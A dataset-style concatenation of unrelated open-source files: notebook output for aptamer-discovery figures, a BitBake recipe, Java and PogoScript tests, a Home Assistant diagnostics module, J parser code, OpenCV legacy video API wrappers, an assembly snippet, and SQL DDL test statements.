" \u003cth rowspan=\"4\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e687\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e6\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e702\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e385\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" sequence\n",
"round2_low_no_serum_flag round2_medium_no_serum_flag round2_high_no_serum_flag \n",
"False False False 908587\n",
" True 44\n",
" True False 27\n",
" True 3\n",
"True False False 687\n",
" True 6\n",
" True False 702\n",
" True 385"
]
},
"execution_count": 13,
"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title Figure 2B Raw Data\n",
"pd_input_df.groupby('round2_low_no_serum_flag\tround2_medium_no_serum_flag\tround2_high_no_serum_flag'.split()).count()[['sequence']]"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 498
},
"executionInfo": {
"elapsed": 396,
"status": "ok",
"timestamp": 1603828883625,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "pg5zbUUAdywu",
"outputId": "411ae6ee-7eb1-4bb0-a27d-f1eae398f2ec"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003esequence\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eround1_low_flag\u003c/th\u003e\n",
" \u003cth\u003eround1_medium_flag\u003c/th\u003e\n",
" \u003cth\u003eround1_high_flag\u003c/th\u003e\n",
" \u003cth\u003eround1_very_flag\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"6\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e179161\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e2\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e185\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e1\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e12\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e1\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"8\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e5426\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e3\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e22\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e1\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e2360\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e15\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e276\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e84\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" sequence\n",
"round1_low_flag round1_medium_flag round1_high_flag round1_very_flag \n",
"False False False False 179161\n",
" True False 2\n",
" True False False 185\n",
" True 1\n",
" True False 12\n",
" True 1\n",
"True False False False 5426\n",
" True 3\n",
" True False 22\n",
" True 1\n",
" True False False 2360\n",
" True 15\n",
" True False 276\n",
" True 84"
]
},
"execution_count": 14,
"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title Figure 2C Raw Data\n",
"\n",
"# To build venn (green), sum preceding True flags to get consistent sets\n",
"# 512 nM = 5426+3 = 5429\n",
"# 512 \u0026 128 nM = 2360+15 = 2375\n",
"# 512 \u0026 128 \u0026 32nM (including 8 nM) = 276+84 = 360\n",
"# To build venn (grey) Inconsistent flags are summed (ignoring 8nM)\n",
"# 128 nM only = 185 + 1 = 186\n",
"# 128 nM \u0026 32 nM = 12+1 = 13\n",
"# 32 nM only = 2\n",
"# 32 nM and 512 nM only = 22+1 = 23\n",
"# \n",
"# To build pie, look at all round1_very_flags = True\n",
"# Green = 84\n",
"# Grey = 15+1+3+1+1 = 21\n",
"mlpd_input_df.groupby('round1_low_flag\tround1_medium_flag\tround1_high_flag round1_very_flag'.split()).count()[['sequence']]"
]
}
],
"metadata": {
"colab": {
"collapsed_sections": [],
"last_runtime": {
"build_target": "//research/biology/alphagenome:alphagenome_colab",
"kind": "private"
},
"name": "Figure 2 Machine-learning-guided aptamer discovery (submission).ipynb",
"provenance": [
{
"file_id": "1awuRoRT0n6iLSMTAH03CSq37KGCWxu2u",
"timestamp": 1603475056932
},
{
"file_id": "1itCfSxMlDDu7xKKROn10EXhWbXdxo1TX",
"timestamp": 1603474788314
},
{
"file_id": "10_qNH-XhiJZMakduzsEXNKEd-DEshYmQ",
"timestamp": 1603357039688
},
{
"file_id": "1pPg_LPXmogMdDy8aAL7E1Hul-jYibALI",
"timestamp": 1603150899877
},
{
"file_id": "1LIbYnfPYSbjPtFZzwtXR6O60QvL4RdO6",
"timestamp": 1603141230651
},
{
"file_id": "16B2JDwBLtT2JOMJGeyla-SjS29bYQgvK",
"timestamp": 1593452704228
},
{
"file_id": "1iXrZrd9UCDJ9oaqBxOC7EHtQpnvhVkW4",
"timestamp": 1593120468277
},
{
"file_id": "1DqHktleGMNONMackZeve8sElQ2fOcFhL",
"timestamp": 1586448562556
},
{
"file_id": "1Dk8MgJu86W_KO8peayyo0Y02pfLkqdqX",
"timestamp": 1583452332056
},
{
"file_id": "1ru5ARNkGB19RTacCND48NJhnR3o2qqNr",
"timestamp": 1582239842118
},
{
"file_id": "1T1XL25bS7L81erHwCzf6HVueqPo42uit",
"timestamp": 1581621943122
},
{
"file_id": "1DQTQ5EmzbqpVflUaCJYZhIKLbxP19x2g",
"timestamp": 1581360733451
},
{
"file_id": "1pIJUGr60UyOf2le4ehPaR2HFDWT7fB3Q",
"timestamp": 1581018638744
},
{
"file_id": "1mpk7R6pNQUD6tdW9aaSt0D784PkVoC5f",
"timestamp": 1580404906728
},
{
"file_id": "1WFx5uXw0gzNEVUFfik9l_Q4zvD1XP7mq",
"timestamp": 1576173640261
},
{
"file_id": "1fFgkqbG8adO4L9rpozRgJ98ClcKwPcbw",
"timestamp": 1566493555486
}
],
"toc_visible": true
},
"kernelspec": {
"display_name": "Python 3",
"name": "python3"
}
},
"nbformat": 4,
"nbformat_minor": 0
}
| Jupyter Notebook | 5 | shaun95/google-research | aptamers_mlpd/figures/Figure_2_Machine_learning_guided_aptamer_discovery_(submission).ipynb | [
"Apache-2.0"
] |
require go-cross-canadian.inc
require go-${PV}.inc
| BitBake | 0 | cmonr/meta-pelion-edge | recipes-devtools/go/go-cross-canadian_1.14.bb | [
"Apache-2.0"
] |
package jadx.tests.functional;
import org.junit.jupiter.api.Test;
import jadx.core.export.TemplateFile;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.containsString;
public class TemplateFileTest {
@Test
public void testBuildGradle() throws Exception {
TemplateFile tmpl = TemplateFile.fromResources("/export/app.build.gradle.tmpl");
tmpl.add("applicationId", "SOME_ID");
tmpl.add("minSdkVersion", 1);
tmpl.add("targetSdkVersion", 2);
tmpl.add("versionCode", 3);
tmpl.add("versionName", "1.2.3");
String res = tmpl.build();
System.out.println(res);
assertThat(res, containsString("applicationId 'SOME_ID'"));
assertThat(res, containsString("targetSdkVersion 2"));
assertThat(res, containsString("versionCode 3"));
assertThat(res, containsString("versionName \"1.2.3\""));
}
}
| Java | 4 | Dev-kishan1999/jadx | jadx-core/src/test/java/jadx/tests/functional/TemplateFileTest.java | [
"Apache-2.0"
] |
"""Support for the Airzone diagnostics."""
from __future__ import annotations
from typing import Any
from aioairzone.const import API_MAC, AZD_MAC
from homeassistant.components.diagnostics.util import async_redact_data
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_UNIQUE_ID
from homeassistant.core import HomeAssistant
from .const import DOMAIN
from .coordinator import AirzoneUpdateCoordinator
TO_REDACT_API = [
API_MAC,
]
TO_REDACT_CONFIG = [
CONF_UNIQUE_ID,
]
TO_REDACT_COORD = [
AZD_MAC,
]
async def async_get_config_entry_diagnostics(
hass: HomeAssistant, config_entry: ConfigEntry
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
coordinator: AirzoneUpdateCoordinator = hass.data[DOMAIN][config_entry.entry_id]
return {
"api_data": async_redact_data(coordinator.airzone.raw_data(), TO_REDACT_API),
"config_entry": async_redact_data(config_entry.as_dict(), TO_REDACT_CONFIG),
"coord_data": async_redact_data(coordinator.data, TO_REDACT_COORD),
}
| Python | 4 | liangleslie/core | homeassistant/components/airzone/diagnostics.py | [
"Apache-2.0"
] |
ic =: 4 : 0
defn =. 'pdefn' conew~ x;y
DU =. get_DU__defn ''
coerase"0 (#~ >:&".&>&defn) conl 1
DU
)
NB. =========================================================
cocurrent 'pcommon'
NB. split into (chars,.prec)
sp1 =: ((,(<-~2),~<)`(}:@[ (,>:&.>) {:@[)@.(' '=])~ ,@boxopen)/@:|.&.(' '&,)
sp =: [: ({."1 ,. [:]&.> _ (_1}) 2 >./\ 0,>@{:"1) _2 ]\ sp1
NB. parse (does not work with parens)
stapply =: 3 (({. (<@|.@[ , [:>.&.>/0 2{])/@:|:@:, }.)@:{. , }.) ]
ifapp =: (-:\:~)@:(,&:({:"1) 2&{.) ` 0: @. (3>#@])
parse =: [: {."1 (([ , stapply^:ifapp^:_) ,:^:(2-#@$))/ &.: ((,:'$';_)&,)@:|.@:sp
NB. give op,args for a function
farg =: 1&{ ,`(|.@])@.((<'.')-:[) 0 2&{
NB. Function notation utils
paren =: '(',,&')'
list =: (,','&,)&.>/(>@:)^:(*@#)
cfun =: , [:paren list^:(0<L.)
apply =: ] cfun~ 'apply',":@<:@#@],'_',[
NB. =========================================================
cocurrent 'pdefn'
coinsert 'pcommon'
NB. ---------------------------------------------------------
NB. y is name;definition
create =: 3 : 0
name =: x [ 'x y' =. y
NB. Parse; split into LHS and RHS
p =. parse y
'Incorrect number of functions' assert 1=#p
p =. >{.p
'Must be an assignment' assert ':'-:1{::p
'L def1' =. 0 2{p
NB. Extract op and args from LHS
op =: >{: L =. <`([: (<@}.,$:@>@{.) farg)@.(1<#) L
L =. }: L
'LHS depth cannot exceed 2' assert 2>:#L
'Repeated args in LHS' assert *./@:~: ;L
NB. Number for use as a suffix
N =: {.@":"0 |. #@> L
NB. Turn LHS arguments into objects
cname =. ; ((] #&.> 'lr'{.~#@[)&.> 1+i.@-@#) L
nval =. ; (]"0&.> 1{.~#) L
vals =: 'pobject' conew"1~ cname ,. nval ;"0 _ ''
getval =: vals {~ (;;L)&i.
defn =: getobj def1
decln =: 0 NB. Number of complex declarations so far (a,b,...)
vars =: 0 2$a: NB. List of variables to declare and free
)
getobj =: 3 : 0
if. 1=#y do. getval y return. end.
'pobject' conew~ 'fn';1;< getobj@> farg y
)
plusa =: 4 :'+&x&.(a.&i.) y'&'a'
newdecl =: 3 :',plusa <:decln =: >:decln'
addvar =: 3 : 'vars =: vars,y'
get_T =: 3 : 0
T =. get_T__defn :: ((<'V')"_) 2
(name ;~ 'return ',,&'; ')`(''&;)@.(0<L.) T
)
get_P =: 3 : 0
e =. {. get_P__defn 2 NB. vars is created as a side effect
f1 =. 4 :'(''FREE''cfun ''P''cfun])`(''ddel''&cfun)@.(nval__x)&.> y'/"1
e =. vars (('V ',[:list{:"1@]) ; (, f1))~^:(*@#@[) e
e =. e , 'del'&cfun&.> ;3 :'<del__y $0'"0 vals
name ;~ ; ,&'; '&.> e
)
get_DU =: 3 : 0
T =. get_T ''
P =. get_P ''
D =. ; 'TP' ('D_',[,N,(paren name),' { ',],'}',LF"_)^:(*@#@])&.> T,&{.P
DBX =. ';',~ 'DB' cfun (N,~tolower@[) ; (qop=.''''(,,[)op) ; ]
U =. ; T ((' ',LF),~&.>'TP' DBX&.> ,)`(LF,~';',~'D'cfun N;qop;])@.-:&{: P
D;U
)
NB. ---------------------------------------------------------
cocurrent 'pobject'
coinsert 'pcommon'
NB. y is name;nval;args
create =: 3 : 0
'name nval args' =: y
coinsert (*#args) { ;:'pvalue pfunction'
)
T =: 'T'&cfun
NB. get_T: y is
NB. 0 if the type is required
NB. 1 if the value is required
NB. 2 if the type is required and the result is output
NB. get_P: y is
NB. 0 if the value will be consumed
NB. 1 if the value will not be consumed
NB. 2 if the result should be stored in p
NB. The value returned is (expression;freename) and any declarations are
NB. added to the pdef object.
NB. freename is empty, or the temp name to use for FREE.
cocurrent 'pvalue'
get_T =: 3 : 'T^:(-.y+nval)`<@.(y=2) name'
Nu =: 0
get_P =: 3 : 0
v =. 0 > nval =: nval - y~:1
nval =: 0>.nval
if. y=2 do.
'' ;~ (v{::'mv_P';'cp_P') cfun 'p';name
else.
if. -.v do. name;'' else. ('cpy'&cfun ; ,&((Nu=:Nu+1)#'_')) name end.
end.
)
del =: 3 : 'nval # <name'
cocurrent 'pfunction'
get_T =: 3 : 0
[:^:(y=1) ''
'T' apply (4 :'<get_T__y x'"0~ 1{.~#) args
)
get_P =: 3 : 0
nval =: nval - y~:1
ord =. 2,}.4 :'name__x-:y'&'fn'"0 args
n=.":<:#g =. (4 :'get_P__y x'"0&.:((|.\:ord)&{)~ 1{.~#) args
'ge gd' =. <"_1|:g
if. y=2 do.
suff =. '_P'
a =. ''
else.
d =. *./ *@#@> }.gd NB. if apply should delete the arguments
gd =. '' ; (-.d) #&.> }.gd
suff =. (#. d,~#@>{.gd) {:: '';'_d';'d';'dd'
a =. newdecl__COCREATOR ''
end.
args addvar__COCREATOR@;^:(*@#@])&> gd
a ;~ ('apply',n,suff) cfun 'p'&;^:(y=2) gd (,'='&,)^:(*@#@[)&.> ge
)
| J | 4 | mlochbaum/ILanguage | ic/ic.ijs | [
"0BSD"
] |
// This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
#include "precomp.hpp"
#include "opencv2/videoio/registry.hpp"
#include "videoio_registry.hpp"
using namespace cv;
// Legacy C-like API
CV_IMPL CvCapture* cvCreateCameraCapture(int)
{
CV_LOG_WARNING(NULL, "cvCreateCameraCapture doesn't support legacy API anymore.")
return NULL;
}
CV_IMPL CvCapture* cvCreateFileCaptureWithPreference(const char*, int)
{
CV_LOG_WARNING(NULL, "cvCreateFileCaptureWithPreference doesn't support legacy API anymore.")
return NULL;
}
CV_IMPL CvCapture* cvCreateFileCapture(const char * filename)
{
return cvCreateFileCaptureWithPreference(filename, CAP_ANY);
}
CV_IMPL CvVideoWriter* cvCreateVideoWriter(const char*, int, double, CvSize, int)
{
CV_LOG_WARNING(NULL, "cvCreateVideoWriter doesn't support legacy API anymore.")
return NULL;
}
CV_IMPL int cvWriteFrame(CvVideoWriter* writer, const IplImage* image)
{
return writer ? writer->writeFrame(image) : 0;
}
CV_IMPL void cvReleaseVideoWriter(CvVideoWriter** pwriter)
{
if( pwriter && *pwriter )
{
delete *pwriter;
*pwriter = 0;
}
}
CV_IMPL void cvReleaseCapture(CvCapture** pcapture)
{
if (pcapture && *pcapture)
{
delete *pcapture;
*pcapture = 0;
}
}
CV_IMPL IplImage* cvQueryFrame(CvCapture* capture)
{
if (!capture)
return 0;
if (!capture->grabFrame())
return 0;
return capture->retrieveFrame(0);
}
CV_IMPL int cvGrabFrame(CvCapture* capture)
{
return capture ? capture->grabFrame() : 0;
}
CV_IMPL IplImage* cvRetrieveFrame(CvCapture* capture, int idx)
{
return capture ? capture->retrieveFrame(idx) : 0;
}
CV_IMPL double cvGetCaptureProperty(CvCapture* capture, int id)
{
return capture ? capture->getProperty(id) : 0;
}
CV_IMPL int cvSetCaptureProperty(CvCapture* capture, int id, double value)
{
return capture ? capture->setProperty(id, value) : 0;
}
CV_IMPL int cvGetCaptureDomain(CvCapture* capture)
{
return capture ? capture->getCaptureDomain() : 0;
}
| C++ | 4 | thisisgopalmandal/opencv | modules/videoio/src/videoio_c.cpp | [
"BSD-3-Clause"
] |
BITS 32
push eax
hlt
| Assembly | 0 | brenden7158/v86 | tests/expect/tests/push.asm | [
"BSD-2-Clause"
] |
CREATE TABLE `tb_fwnltgnpeg` (
`col_gzxmlukzgv` smallint(169) unsigned zerofill NOT NULL,
PRIMARY KEY (`col_gzxmlukzgv`),
UNIQUE INDEX `uk_gwlvlnvrkh` (`col_gzxmlukzgv`),
UNIQUE INDEX `uk_ygsnwxzroc` (`col_gzxmlukzgv`)
) DEFAULT CHARSET=utf8;
RENAME TABLE `tb_fwnltgnpeg` TO `tb_hmfoniytbf`;
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN `col_gxqvwbkvyi` datetime(5);
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN (`col_fthqvynbuq` mediumint unsigned zerofill, `col_dcxnatwddd` date DEFAULT '2019-07-04');
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN `col_wvbemkrzdt` longtext CHARACTER SET utf8 COLLATE utf8_unicode_ci FIRST;
ALTER TABLE `tb_hmfoniytbf` ADD `col_alzezpawqi` longblob;
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN `col_tpzhsbkmka` longtext;
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN (`col_urfoabrjor` bit(15) NOT NULL, `col_xreorfbhxc` decimal(35) NULL);
ALTER TABLE `tb_hmfoniytbf` DEFAULT CHARACTER SET utf8;
ALTER TABLE `tb_hmfoniytbf` ADD UNIQUE INDEX `uk_ztdbxlchxi` (`col_alzezpawqi`(18),`col_tpzhsbkmka`(30));
ALTER TABLE `tb_hmfoniytbf` ALTER COLUMN `col_dcxnatwddd` DROP DEFAULT;
ALTER TABLE `tb_hmfoniytbf` DROP COLUMN `col_tpzhsbkmka`, DROP COLUMN `col_dcxnatwddd`;
ALTER TABLE `tb_hmfoniytbf` DROP `col_alzezpawqi`, DROP `col_wvbemkrzdt`;
ALTER TABLE `tb_hmfoniytbf` DROP `col_gzxmlukzgv`, DROP `col_xreorfbhxc`;
ALTER TABLE `tb_hmfoniytbf` DROP `col_gxqvwbkvyi`, DROP `col_fthqvynbuq`;
| SQL | 2 | yuanweikang2020/canal | parse/src/test/resources/ddl/alter/test_8.sql | [
"Apache-2.0"
] |
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 4.233 4.233" height="16" width="16"><path d="M.15 2.992c-.198.1-.2.266-.002.365l1.604.802a.93.93 0 00.729-.001l1.602-.801c.198-.1.197-.264 0-.364l-.695-.348c-1.306.595-2.542 0-2.542 0m-.264.53l.658-.329c.6.252 1.238.244 1.754 0l.659.329-1.536.768zM.15 1.935c-.198.1-.198.265 0 .364l1.604.802a.926.926 0 00.727 0l1.603-.802c.198-.099.198-.264 0-.363l-.694-.35c-1.14.56-2.546.001-2.546.001m-.264.53l.664-.332c.52.266 1.261.235 1.75.002l.659.33-1.537.768zM.15.877c-.198.099-.198.264 0 .363l1.604.802a.926.926 0 00.727 0l1.603-.802c.198-.099.198-.264 0-.363L2.481.075a.926.926 0 00-.727 0zm.43.182L2.117.29l1.538.769-1.538.768z"/></svg> | SVG | 0 | MMeent/pdf.js | web/images/toolbarButton-viewLayers.svg | [
"Apache-2.0"
] |
plot sin(x) with lines
replot cos(x) with lines
| Gnuplot | 2 | Iinguistics/algorithm-archivists.github.io | contents/plotting/code/gnuplot/sine.gp | [
"MIT"
] |
path = require 'path'
fs = require 'fs'
script = require './pogoAssertions'
withArgsShouldOutput = script.withArgsShouldOutput
childProcess = require 'child_process'
net = require 'net'
require 'chai'.should()
describe 'pogo command'
it "`process.argv` contains 'pogo', the name of the
script executed, and the arguments from the command line"
'console.log (process.argv)' withArgs ['one', 'two'] shouldOutput "[ 'pogo',
'#(path.resolve '343111c34d666435dd7e88265c816cbfdbe68cd3.pogo')',
'one',
'two' ]"
it "`__filename` should be the name of the script"
'console.log (__filename)' withArgs [] shouldOutput (path.resolve "5be55a44c52f14d048d19c020fd913199ae2e61c.pogo")
it "`__dirname` should be the name of the script"
'console.log (__dirname)' withArgs [] shouldOutput (path.resolve ".")
it "runs script files even if they don't use the .pogo extension"
'console.log "hi"' withArgs [] shouldOutput 'hi' (scriptFilename: 'ascript')
it "script can take same switches as pogo script, like --compile"
'console.log (process.argv)' withArgs ['--compile'] shouldOutput "[ 'pogo',
'#(path.resolve '343111c34d666435dd7e88265c816cbfdbe68cd3.pogo')',
'--compile' ]"
write (content) toFile (filename) =
fs.writeFile ("#(__dirname)/#(filename)", content, ^)
expandPogoCommand (command) =
if (r/^pogo( |$)/.test (command))
pogo = __dirname + "/../../bin/pogo"
command.replace r/^pogo/ (pogo)
else
command
runShim (command, callback) =
expandedCommand = expandPogoCommand (command)
childProcess.exec (expandedCommand, {cwd = __dirname}) @(error, stdout, stderr)
callback (error, {stdout = stdout, stderr = stderr})
run (command) = runShim (command, ^)
describe 'pogo --compile'
afterEach
unlink "#(__dirname)/toCompile.pogo"!
unlink "#(__dirname)/toCompile.js"!
it 'can compile a script'
write "console.log 'hi'" toFile "toCompile.pogo"!
pogoOutput = run "pogo -c toCompile.pogo"!
pogoOutput.stdout.should.equal ''
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "hi\n"
nodeOutput.stderr.should.equal ''
(n)ms = n
(n)s = n * 1000
wait (milliseconds) =
setTimeout (^, milliseconds)
unlink (file)! =
try
fs.unlink (file, ^)!
catch (error)
if (error.code != 'ENOENT')
throw (error)
describe 'pogo --help'
it 'prints out help'
pogoOutput = run "pogo --help"!
pogoOutput.stdout.should.match r/usage:/
pogoOutput.stdout.should.match r/--compile/
pogoOutput.stdout.should.match r/--watch/
describe 'pogo --compile --if-stale'
beforeEach
unlink "#(__dirname)/toCompile.pogo"!
unlink "#(__dirname)/toCompile.js"!
afterEach
unlink "#(__dirname)/toCompile.pogo"!
unlink "#(__dirname)/toCompile.js"!
it 'compiles a pogo script if the js is missing'
write "console.log 'hi'" toFile "toCompile.pogo"!
pogoOutput = run "pogo -cs toCompile.pogo"!
pogoOutput.stdout.should.equal "compiling toCompile.pogo => toCompile.js\n"
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "hi\n"
nodeOutput.stderr.should.equal ''
it 'compiles a pogo script if the js is out of date'
write "console.log('old')" toFile "toCompile.js"!
wait (1s)!
write "console.log 'new'" toFile "toCompile.pogo"!
pogoOutput = run "pogo -cs toCompile.pogo"!
pogoOutput.stdout.should.equal "compiling toCompile.pogo => toCompile.js\n"
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "new\n"
nodeOutput.stderr.should.equal ''
it "doesn't recompile the js if it the pogo is older"
write "console.log 'pogo'" toFile "toCompile.pogo"!
wait (1s)!
write "console.log('js')" toFile "toCompile.js"!
pogoOutput = run "pogo -cs toCompile.pogo"!
pogoOutput.stdout.should.equal ''
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "js\n"
nodeOutput.stderr.should.equal ''
describe 'debugging'
describe '--debug'
this.timeout 3000
it 'starts remote debugging'
write "console.log 'bug!'" toFile "toDebug.pogo"!
pogoOutput = run 'pogo --debug toDebug.pogo'!
pogoOutput.stderr.should.equal "Debugger listening on port 5858\n"
pogoOutput.stdout.should.equal "bug!\n"
describe '`pogo` (interactive)'
util = require 'util'
errorRegex = r/^Error: ((.|\n)*?)\n> > /
pogoSession () =
pogo = childProcess.spawn (expandPogoCommand 'pogo', []) {
cwd = __dirname
stdio = 'pipe'
}
handleResult = nil
currentOutput = ''
firstPrompt = true
pogo.stdout.on 'data' @(data)
out = data.toString ()
currentOutput := currentOutput + out
if (errorRegex.test (currentOutput))
match = errorRegex.exec(currentOutput)
commandErrorOutput = match.1
currentOutput := currentOutput.replace(errorRegex, '')
if (firstPrompt)
firstPrompt := false
else
handleResult (commandErrorOutput)
else if (r/^Error: /.test (currentOutput))
nil
else if (r/^> $/m.test (currentOutput))
commandOutput = currentOutput.replace (r/\n?> $/, '')
currentOutput := ''
if (firstPrompt)
firstPrompt := false
else
handleResult (commandOutput)
pogo.stderr.on 'data' @(data)
console.log 'error'
console.log (data.toString ())
{
issue (command)! =
promise @(success)
handleResult (actualResult) :=
success()
pogo.stdin.write "#(command)\n"
issue (command) andExpect (result)! =
promise @(success)
handleResult (actualResult) :=
if (result :: RegExp)
actualResult.should.match (result)
else
actualResult.should.equal (result)
success ()
pogo.stdin.write "#(command)\n"
exit ()! =
promise @(success)
pogo.on 'exit' @(code)
success (code)
pogo.stdin.end ()
}
it 'evaluates a simple line of pogoscript'
pogo = pogoSession ()
pogo.issue '8' andExpect '8'!
pogo.exit()!
it 'can continue in the face of syntax errors'
pogo = pogoSession ()
pogo.issue 'blah "' andExpect r/Expecting '\('/!
pogo.issue '8' andExpect '8'!
pogo.exit()!
it 'variables are shared among different lines'
pogo = pogoSession ()
pogo.issue 'a = 8' andExpect '8'!
pogo.issue 'a' andExpect '8'!
pogo.exit()!
it 'evaluates async operations'
pogo = pogoSession ()
pogo.issue 'a()! = 8' andExpect '[Function]'!
pogo.issue 'a()!' andExpect '8'!
pogo.exit()!
it 'evaluates async assignments'
pogo = pogoSession ()
pogo.issue 'a()! = 8' andExpect '[Function]'!
pogo.issue 'b = a()!' andExpect '8'!
pogo.issue 'b' andExpect '8'!
pogo.exit()!
it 'evaluates async assignments properly'
pogo = pogoSession ()
pogo.issue 'a ()! = @{ setTimeout (^, 100), t = (@new Date).getTime (), console.log (t), {t = t} }'!
pogo.issue 'b = a()!'!
pogo.issue 'c = b'!
pogo.issue 'c == b'!
pogo.issue 'b = a()!'!
pogo.issue 'c == b' andExpect 'false'!
pogo.exit()!
it 'can require a local file'
write "exports.x = 'x'" toFile "local.pogo"!
pogo = pogoSession ()
pogo.issue 'require "./local"' andExpect "{ x: 'x' }"!
pogo.exit()!
describe 'pogo --promises'
promisesTests (runPogoCommand) =
it 'default is set to none, using the global Promise'
